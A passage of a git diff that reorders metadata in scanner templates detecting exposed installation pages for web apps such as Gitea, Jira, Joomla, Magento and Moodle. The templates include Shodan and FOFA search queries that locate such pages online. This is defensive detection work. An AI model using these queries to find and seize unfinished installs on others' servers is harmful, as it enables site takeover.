4a0a00473045022100b7b0f6543091bf4d2e67ee2802feb0a57241e524da29c7f944e2ced8ec8e393c022061aea2773aebd96772ca54801007608b062c90bcf5d646e8ce1f4bc66dc017b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml index 7c2bd18b07..d84e830ddb 100644 --- a/http/misconfiguration/installer/freshrss-installer.yaml +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | FreshRSS Installation panel has been exposed. - metadata: - max-request: 1 - verified: true - fofa-query: title="Installation · FreshRSS" - product: freshrss - vendor: freshrss - tags: freshrss,misconfig,install - classification: cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: freshrss + product: freshrss + fofa-query: title="Installation · FreshRSS" + tags: freshrss,misconfig,install + http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502201be450e605b599c6d36b357788f621d3a83eab8869cb89db0ff2fbee40144bc3022100ddee3a990f7e99e484aab70b043588bef73456fad195f25223e240fb32da0499:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index 839e2cc0c8..d239f9e586 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -8,16 +8,16 @@ info: Detects the Froxlor Server Management Panel installation page. reference: - https://www.exploit-db.com/ghdb/8397 + classification: + cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Froxlor Server Management Panel - Installation" - product: froxlor vendor: froxlor + product: froxlor + fofa-query: title="Froxlor Server Management Panel - Installation" tags: misconfig,froxlor,installer - classification: - cpe: cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220695c81721e332a2db39f811d04654510ceb4713c52764cff3d2696fb5b9988ec0220177dd8a1a70a903fc09d70bc443fa2b0a5174ca43f3c515996b14604ee1bbf87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/gitea-installer.yaml b/http/misconfiguration/installer/gitea-installer.yaml index b8c26bca90..d56ba0bba8 100644 --- a/http/misconfiguration/installer/gitea-installer.yaml +++ b/http/misconfiguration/installer/gitea-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: medium description: Gitea is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' - product: gitea vendor: gitea + product: gitea + shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' tags: misconfig,gitea,install - classification: - cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022066f56b7a2930ae1593161115abd054f1cde3376fff7c907e4d98fda3fe72d90b02210091ea2d42390407b9c1751b0d9f8570ac5d7c9b510f6ca102fddee07b16022220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml index 78f6833c41..829e6d9caf 100644 --- a/http/misconfiguration/installer/glpi-installer.yaml +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed GLPI Setup page. reference: - https://glpi-project.org/ + classification: + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Setup GLPI" - product: glpi vendor: glpi-project + product: glpi + shodan-query: html:"Setup GLPI" tags: misconfig,install,exposure,glpi - classification: - cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100fab1664db0007ba958243c418dd797ae303186f6f4aef52864c05be2af3488b5022100eae3c16b34681d89735d78279ed5965fc9993f5e901ffcf0e8b06a2ce408dd88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml index fd34a01b0f..74e328874c 100644 --- a/http/misconfiguration/installer/growi-installer.yaml +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Checks for the presence of a GROWI Installer. + classification: + cpe: cpe:2.3:a:weseek:growi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Installer - GROWI" - product: growi vendor: weseek + product: growi + shodan-query: html:"Installer - GROWI" tags: install,growi,exposure,misconfig - classification: - cpe: cpe:2.3:a:weseek:growi:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index b7bb83dd99..8ac802c79f 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: low description: ImpressPages is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:impresspages:impresspages_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"ImpressPages installation wizard" - product: impresspages_cms vendor: impresspages + product: impresspages_cms + shodan-query: http.title:"ImpressPages installation wizard" tags: misconfig,exposure,install,impresspages - classification: - cpe: cpe:2.3:a:impresspages:impresspages_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ac1631cfa08a1af2bb4a789da010263e7ba43d5c7d160a3cb8ef667ce2b53c21022100a79a9d3c3a686c50cb0b5d39deff192103bd71a98da9081f8270706802715d38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/jira-setup.yaml b/http/misconfiguration/installer/jira-setup.yaml index cb4a6a9c2f..e508944f6a 100644 --- a/http/misconfiguration/installer/jira-setup.yaml +++ b/http/misconfiguration/installer/jira-setup.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Atlassian JIRA is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"JIRA - JIRA setup" - product: jira vendor: atlassian + product: jira + shodan-query: title:"JIRA - JIRA setup" tags: misconfig,jira,atlassian,installer - classification: - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502202be8e9b1b4f8f254128e5963923eea49de2beb40da3453771615c5facd21c80d022100a29b9eb24be364da07e566b5b74fabcffa33d817f115c504bb3a39dc003d0931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/joomla-installer.yaml b/http/misconfiguration/installer/joomla-installer.yaml index 15691152b9..2a4fba8f02 100644 --- a/http/misconfiguration/installer/joomla-installer.yaml +++ b/http/misconfiguration/installer/joomla-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Joomla is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Joomla Web Installer" - product: joomla\\! vendor: joomla + product: joomla\\! + shodan-query: title:"Joomla Web Installer" tags: misconfig,joomla,install - classification: - cpe: cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502206999fbe3f32c72ea8527d6ab44e0dc0e4875cc134390924bf587415690565463022100889d4fdd2020d31fc79e6b9e349d5a593d321698c00d48937a5713c2f228e208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/knowledgetree-installer.yaml b/http/misconfiguration/installer/knowledgetree-installer.yaml index 402bdcf6ec..8d54d59218 100644 --- a/http/misconfiguration/installer/knowledgetree-installer.yaml +++ b/http/misconfiguration/installer/knowledgetree-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: KnowledgeTree is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:knowledgetree:knowledgetree:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"KnowledgeTree Installer" - product: knowledgetree vendor: knowledgetree + product: knowledgetree + shodan-query: title:"KnowledgeTree Installer" tags: misconfig,knowledgetree,install,exposure - classification: - cpe: cpe:2.3:a:knowledgetree:knowledgetree:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml index 6a92bd5f19..9ad425424f 100644 --- a/http/misconfiguration/installer/kodbox-installer.yaml +++ b/http/misconfiguration/installer/kodbox-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | Kodbox is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="kodbox" && body="install" - product: kodbox vendor: kodcloud + product: kodbox + fofa-query: title="kodbox" && body="install" tags: misconfig,exposure,install,kodbox - classification: - cpe: cpe:2.3:a:kodcloud:kodbox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c07fcf62c57059aedba917e1553845d84695eeaebbfc10bf1aa17f3cc4577831022100a5f154ad42a1460a48b695348c2848636df98135009ce44c64d53bc21968eeb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml index cc6d9ec512..908f51ad8b 100644 --- a/http/misconfiguration/installer/librenms-installer.yaml +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed LibreNMS installation page. reference: - https://docs.librenms.org/Installation/Install-LibreNMS/ + classification: + cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"LibreNMS Install" - product: librenms vendor: librenms + product: librenms + shodan-query: html:"LibreNMS Install" tags: misconfig,install,exposure,librenms - classification: - cpe: cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e9b5592a53be643246e6e5bee43973a44e97ff6e655d49fb6c8b4619de4823bd02205422d2733a061db4c85e518eaa773ef081286379248d0bf8e0a3b12ada08e8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/limesurvey-installer.yaml b/http/misconfiguration/installer/limesurvey-installer.yaml index aa70fb3571..7946d5bae7 100644 --- a/http/misconfiguration/installer/limesurvey-installer.yaml +++ b/http/misconfiguration/installer/limesurvey-installer.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDk severity: high description: Limesurvey is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 @@ -12,9 +14,6 @@ info: product: limesurvey vendor: limesurvey tags: misconfig,limesurvey,install - - classification: - cpe: cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/misconfiguration/installer/lychee-installer.yaml b/http/misconfiguration/installer/lychee-installer.yaml index eba6fd1171..5211c62470 100644 --- a/http/misconfiguration/installer/lychee-installer.yaml +++ b/http/misconfiguration/installer/lychee-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Lychee is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Lychee-installer" - product: lychee vendor: lycheeorg + product: lychee + shodan-query: html:"Lychee-installer" tags: misconfig,lychee,install,exposure - classification: - cpe: cpe:2.3:a:lycheeorg:lychee:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c81139c08437b0f812c8b9ae9ef7d5d31518eb212978fd8c6eaadf5f48a302d7022067c353103dff48b164ae0f43a675e5bba61c9c3f21a88379ec53ccfaa5b4c534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/magento-installer.yaml b/http/misconfiguration/installer/magento-installer.yaml index b8fecf2e4c..942b7d47f0 100644 --- a/http/misconfiguration/installer/magento-installer.yaml +++ b/http/misconfiguration/installer/magento-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Magento is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Magento Installation" - product: magento vendor: magento + product: magento + shodan-query: html:"Magento Installation" tags: misconfig,magento,install,exposure - classification: - cpe: cpe:2.3:a:magento:magento:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009a9f135f529c4ed779f08585c6dbae29f7df153e416a1f88023066c19a093617022024823a2e9dad1a58ebd5dda7b15771e9d6c9a504f69ec178bc765df843ecf686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/magnolia-installer.yaml b/http/misconfiguration/installer/magnolia-installer.yaml index 25e7aec5f3..22fa35c1c1 100644 --- a/http/misconfiguration/installer/magnolia-installer.yaml +++ b/http/misconfiguration/installer/magnolia-installer.yaml @@ -7,16 +7,16 @@ info: description: Magnolia CMS is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.magnolia-cms.com/ + classification: + cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Magnolia Installation" - product: magnolia_cms vendor: magnolia-cms + product: magnolia_cms + shodan-query: title:"Magnolia Installation" tags: magnolia,exposure,installer,misconfig - classification: - cpe: cpe:2.3:a:magnolia-cms:magnolia_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mantisbt-installer.yaml b/http/misconfiguration/installer/mantisbt-installer.yaml index 302e134b69..5fb2398805 100644 --- a/http/misconfiguration/installer/mantisbt-installer.yaml +++ b/http/misconfiguration/installer/mantisbt-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: high description: MantisBT is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Administration - Installation - MantisBT" - product: mantisbt vendor: mantisbt + product: mantisbt + shodan-query: html:"Administration - Installation - MantisBT" tags: misconfig,mantisbt,install,exposure - classification: - cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/matomo-installer.yaml b/http/misconfiguration/installer/matomo-installer.yaml index 5ef364d080..5f6e4eb311 100644 --- a/http/misconfiguration/installer/matomo-installer.yaml +++ b/http/misconfiguration/installer/matomo-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Matomo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Matomo" - product: matomo vendor: matomo + product: matomo + shodan-query: title:"Matomo" tags: misconfig,matomo,install - classification: - cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100b14569b2bb55d1039b208e26140e79f9043b67df4667d82665b409de095df398022100b7d1d2ebeae852cd6051b7bd484d183e467895d2fb5da1d8131cde177477d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mautic-installer.yaml b/http/misconfiguration/installer/mautic-installer.yaml index 796ec33c74..22588733f9 100644 --- a/http/misconfiguration/installer/mautic-installer.yaml +++ b/http/misconfiguration/installer/mautic-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Mautic is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Mautic Installation" - product: mautic vendor: acquia + product: mautic + shodan-query: html:"Mautic Installation" tags: misconfig,mautic,install - classification: - cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100d4bf0bd0a886c38b140b6b100f5d0e256449fd9ceede3f8d5e347624dec95ca5022100e813ce0f08d2a391ba1e198d7ba744f03a5838549b39c266520841d11c268e9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/monstra-installer.yaml b/http/misconfiguration/installer/monstra-installer.yaml index 0e556c6a46..9c8abf71e8 100644 --- a/http/misconfiguration/installer/monstra-installer.yaml +++ b/http/misconfiguration/installer/monstra-installer.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: high description: Monstra is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: 'title:"Monstra :: Install"' - product: monstra_cms vendor: monstra + product: monstra_cms + shodan-query: 'title:"Monstra :: Install"' tags: misconfig,monstra,install - classification: - cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100bde458deeb31935fe9079daf09f7029dd803802fa2210784fbd7f3eda92be34a022100835d08ae3cf17f7f69a80f48806e60a464b1ea1fe6612b13dfd3b187e8fa5a90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/moodle-installer.yaml b/http/misconfiguration/installer/moodle-installer.yaml index e899799053..63d985e0e7 100644 --- a/http/misconfiguration/installer/moodle-installer.yaml +++ b/http/misconfiguration/installer/moodle-installer.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: Moodle is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Installation Moodle" - product: moodle vendor: moodle + product: moodle + shodan-query: title:"Installation Moodle" tags: misconfig,moodle,install,exposure - classification: - cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100a44fedbebfcd8bbc53b2b27e4ea7f86c2c49822f22286e37e36b733dc006c34c02206bf5b0618121eb3c94b05ffcd04c039458e62e48f25360aed2cf8389dbb5f116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/moosocial-installer.yaml b/http/misconfiguration/installer/moosocial-installer.yaml index e0d3ddbe88..2836d51d6c 100644 --- a/http/misconfiguration/installer/moosocial-installer.yaml +++ b/http/misconfiguration/installer/moosocial-installer.yaml @@ -4,16 +4,16 @@ info: name: mooSocial Installation - Exposure author: ritikchaddha severity: high + classification: + cpe: cpe:2.3:a:moosocial:moosocial:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"mooSocial Installation" - product: moosocial vendor: moosocial + product: moosocial + shodan-query: html:"mooSocial Installation" tags: exposure,moosocial,misconfig,install - classification: - cpe: cpe:2.3:a:moosocial:moosocial:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220604d6fd4b0d42d00cb69a6de6fd9fb6be4640fc77b52f7a5cd456b70204f44ac02201a0443dafa9f1e76cfee113ecdda14756f8c86e9721abeab06b8f5ec67d2472d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mosparo-install.yaml b/http/misconfiguration/installer/mosparo-install.yaml index 0e1f5107ee..7564e300ab 100644 --- a/http/misconfiguration/installer/mosparo-install.yaml +++ b/http/misconfiguration/installer/mosparo-install.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: high description: mosparo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Setup - mosparo" - product: mosparo vendor: mosparo + product: mosparo + shodan-query: title:"Setup - mosparo" tags: misconfig,mosparo,install - classification: - cpe: cpe:2.3:a:mosparo:mosparo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml index abed1c9937..dfbf569588 100644 --- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed Mura CMS Setup page. reference: - https://www.murasoftware.com/mura-cms/ + classification: + cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="Mura CMS - Setup" - product: mura_cms vendor: murasoftware + product: mura_cms + fofa-query: body="Mura CMS - Setup" tags: misconfig,install,exposure,mura-cms - classification: - cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/nagiosxi-installer.yaml b/http/misconfiguration/installer/nagiosxi-installer.yaml index f1dcfe234f..fe83cc79bc 100644 --- a/http/misconfiguration/installer/nagiosxi-installer.yaml +++ b/http/misconfiguration/installer/nagiosxi-installer.yaml @@ -5,16 +5,16 @@ info: author: 